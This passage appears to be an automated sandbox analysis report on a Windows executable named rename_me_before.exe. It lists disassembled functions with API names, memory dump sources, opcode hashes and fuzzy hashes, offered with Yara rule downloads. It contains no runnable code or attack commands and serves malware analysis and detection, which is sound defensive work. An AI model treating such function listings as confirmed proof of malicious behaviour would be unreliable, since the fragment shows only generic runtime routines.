                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                                            • Opcode ID: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                                                                                                            • Instruction ID: 9270d81edf57d1095dfa68cf2718a3606eebceb162612fbf8d19bff2acd8ac43
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E115E64F0C662E2FA58B7269645579219B5F983B0F084334EC3ECB7D6DE2CF9118701
                                                                                                                                                                                                                                                            Function 00007FF6404FA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                                            • Opcode ID: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                                                                                                            • Instruction ID: 51b98c31ef0ea062ffa1152fea1eb07504785dc448ceaa345d1643a5bbdef9b7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 451123A0E4C227F2FA68B77644591B9228B4F49370E086734D93ECB3D2ED2CB8518302
                                                                                                                                                                                                                                                            Function 00007FF6404F52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                            • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                                                            • Instruction ID: c929a27461afeba3e76d11864a1beaef009112ee6c67597de271af61dfb95879
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2391AF32A0CA66E1E721BE29E45037D379BAB40B99F884136DB5D873D9DF3CE8458304
                                                                                                                                                                                                                                                            Function 00007FF6404FEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                            • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                                                            • Instruction ID: 309420085532cd179c2b0c260f54809d0f7e54be323ac4e172d0e8a3e367e090
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9581A272E0C223FAF7747F25C21027926AAAF11B48F558035CA09D7796DF2DE941A722
                                                                                                                                                                                                                                                            Function 00007FF6404EC968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                            • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                                                            • Instruction ID: ea18bcb2ca4c266a869d2e7a81082bc039e02fc8e56005ab48a7f25f1fed8839
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D51A132B2D626EADB14FB15E444A787791FB44B89F108130EA5987788EF7CE842C780
                                                                                                                                                                                                                                                            Function 00007FF6404EE1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                            • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                                                            • Instruction ID: d26ef062bfe7f57b41249af47701fcc6fa16d6a2e638fa0a049ebbc3da8f672a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3617F3290CBD5D5EB21EB16E4407AAB7A0FB85794F044225EB9C47B99DF7CE190CB40
                                                                                                                                                                                                                                                            Function 00007FF6404EE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                            • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                                                            • Instruction ID: 3435bf6396a4e8ad41bffa82bdd1c5e47a5f51866054ab524ff2bc78b19782cd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1951AF32A0C262E6EB64FF22904436877A1EB55B84F144136DA9C87BD5CF3CEA51CB81
                                                                                                                                                                                                                                                            Function 00007FF6404E25F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                                                            • API String ID: 1878133881-653037927
                                                                                                                                                                                                                                                            • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                                                            • Instruction ID: c0eb819fd3564ee5e643f48b34dc94857462298f51cb2860743b6e197fce8d6d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80118B7262CA96A1FA24FB10F551BA92364FB84B88F901135DA9C87744CF3CD605C740
                                                                                                                                                                                                                                                            Function 00007FF6404E2870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                                                                            • API String ID: 1878133881-2698358428
                                                                                                                                                                                                                                                            • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                                                            • Instruction ID: 6898f3b46c731db5639d573c148691f02ad36a90d9b99ba9fc6f534e9f9b8114
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73118B7262CA96A1FA24FB10F551BA93364FB84B88F901135DA9C87744CF3CD604C740
                                                                                                                                                                                                                                                            Function 00007FF6404FB8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                                                                            • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                                                            • Instruction ID: 599a62b5aa2e578da32bb14563ad975de4f9c5d34eedb2e8da3037ad89be6239
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4D11372B0CAA1D9E710EF79D4402AD37BAFB45B98B144236CE5E97B99DE38D406C340
                                                                                                                                                                                                                                                            Function 00007FF6404E2030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                                                                            • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                                                            • Instruction ID: 4e1a192d0076a52cf4575ebaa225ae3dffb7ad558b6d2708bffdfd4671950fe0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F11A531E1C16292FA58FB6AE6842BD1292EF89B90F948031DB5987FDACD3DD5C18740
                                                                                                                                                                                                                                                            Function 00007FF640504E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                            • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                                                            • Instruction ID: 7d97436e2cdf763460f67447f8a9ec2903ea4407e4eaf198c9c52247051e6810
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A413E62A0C3A265F728BB25D60137E5755EF827A8F104235EE6C86BD6DF3CD441CB00
                                                                                                                                                                                                                                                            Function 00007FF6404F832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6404F835E
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C58: GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6404EBEC5), ref: 00007FF6404F837C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                            • API String ID: 3580290477-100362983
                                                                                                                                                                                                                                                            • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                                                            • Instruction ID: 0d5b3cdb9dd6dd4a0d6acaf5750bde0d4d7acd2cc4dcc607e8aefcf81ecb72f2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51418132A0CB62E5E718FF25A5810BC379AEF457A4B554039EE5D87B95DE3CE4818700
                                                                                                                                                                                                                                                            Function 00007FF6404FF8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: .$:
                                                                                                                                                                                                                                                            • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                                                            • Opcode ID: 75108fa0d8fcfebdf0f3dc79d92ab90926721088542d1c76d0744241c3be7838
                                                                                                                                                                                                                                                            • Instruction ID: dcd28da8715499e852ed36772311ef6bc3a9062e7d6a0b07aae994aa9edb250e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75108fa0d8fcfebdf0f3dc79d92ab90926721088542d1c76d0744241c3be7838
